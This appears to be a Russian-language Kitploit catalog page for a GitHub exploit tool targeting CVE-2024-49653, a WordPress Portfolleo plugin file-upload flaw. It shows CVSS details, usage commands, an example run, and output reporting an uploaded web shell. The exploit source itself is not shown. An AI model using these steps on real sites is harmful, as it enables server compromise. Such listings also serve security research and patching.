Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-49653 — Плагин Portfolleo для WordPress <= 1.2 - уязвимость произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-49653
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2024-49653

CVE-2024-49653

Плагин Portfolleo для WordPress <= 1.2 - уязвимость произвольной загрузки файлов

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

📜 Эксплойт для плагина WordPress Portfolleo (CVE-2024-49653)

🚨 Детали уязвимости

Название: Плагин WordPress Portfolleo <= 1.2 — уязвимость произвольной загрузки файлов

Описание:
Уязвимость неограниченной загрузки файлов с опасным типом в плагине Portfolleo от James Eggers позволяет загружать веб-шелл на веб-сервер. Эта проблема затрагивает Portfolleo начиная с версии n/a и до 1.2.

Подробнее:

  • CWE-434: Неограниченная загрузка файла с опасным типом

Оценка CVSS:

  • Балл: 9.9
  • Серьёзность: КРИТИЧЕСКАЯ
  • Версия: 3.1
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

📋 Руководство пользователя

🚀 Использование скрипта

Этот скрипт эксплуатирует уязвимость произвольной загрузки файлов в плагине WordPress Portfolleo (версии <= 1.2) для загрузки веб-шелла.

📦 Требования

Для запуска скрипта должны быть установлены следующие компоненты:

  • Python 3
  • библиотека requests
  • библиотека beautifulsoup4

Вы можете установить необходимые библиотеки с помощью:

root@kitploit:~
pip install requests beautifulsoup4

🛠️ Использование

Запустите скрипт со следующими параметрами:

root@kitploit:~

CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD

WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of the site (e.g. http://target/wordpress)
  -U, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

📝 Пример

root@kitploit:~
 
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123

📊 Ожидаемый вывод

Если скрипт выполнится успешно, вы должны увидеть следующий вывод:

root@kitploit:~
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php

⚠️ Отказ от ответственности

Этот скрипт предназначен только для образовательных целей. Автор не одобряет использование этого скрипта для незаконных действий. Используйте его ответственно и только на тех системах, на которые у вас есть явное разрешение на тестирование.

Автор: Nxploited | Khaled Alenazi

Скачать инструмент